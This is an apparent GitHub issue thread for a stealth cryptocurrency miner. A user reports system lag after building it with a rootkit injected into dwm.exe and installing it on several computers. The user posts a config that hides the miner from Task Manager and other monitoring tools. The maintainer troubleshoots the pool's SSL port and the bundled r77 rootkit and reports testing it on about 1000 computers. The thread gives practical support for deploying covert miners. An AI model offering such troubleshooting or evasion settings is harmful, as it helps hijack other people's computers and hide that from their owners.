### ISSUE TITLE
Insane lag and unusable environment

### ISSUE THREAD

**Issue by E4zily** [UnamSanctam/SilentCryptoMiner#1669]
As soon as the miner is started, the entire PC instantly goes to life support: task manager barely works, the UAC prompt doesn't show "yes" or "no", pressing Ctrl + Alt + Delete shows a black screen for a very long time.

Built with a rootkit, using dwm.exe. Same issue occurs with explorer.exe.

**Comment by E4zily** [comment]
fuck sorry, rootkit*

**Comment by UnamSanctam** [comment]
What are all your settings? And does it do that with the rootkit disabled?

**Comment by E4zily** [comment]
doesn't do that with rootkit disabled, here is my JSON:
`{
    "url": "stratums://`[wallet]`@ethw.2miners.com:2020",
    "algo": "ethash",
    "max-gpu": 40,
    "idle-wait": 2,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,nvidiaInspector.exe",
    "kill-targets": "",
    "stealth-fullscreen": true
}`
doesn't seem to mine at all on 2miners btw, looks like a pool issue.

**Comment by UnamSanctam** [comment]
That's because you're using the Non-SSL port with SSL enabled (stratums). A rootkit is very complex and can sometimes cause issues on computers that have problems such as corrupted files or drivers, the miner uses this rootkit: https://github.com/bytecode77/r77-rootkit.

**Comment by E4zily** [comment]
i'm sorry, i switched to ssl but didn't compile, i keep experiencing the same issue even with ssl disabled.

**Comment by E4zily** [comment]
every single computer that i install the rootkit on: gets put on life support. even a pc with windows literally installed just now, all breaks.

**Comment by UnamSanctam** [comment]
You can enable SSL and use the port 12020, `ethw.2miners.com:12020`. But don't use the rootkit if that happens, it used to be inside the "Advanced Options" section for that reason but during the latest update where we (people that are willing to help) tested it on about 1000 computers only one computer experienced visible problems so it was moved out into the normal options.
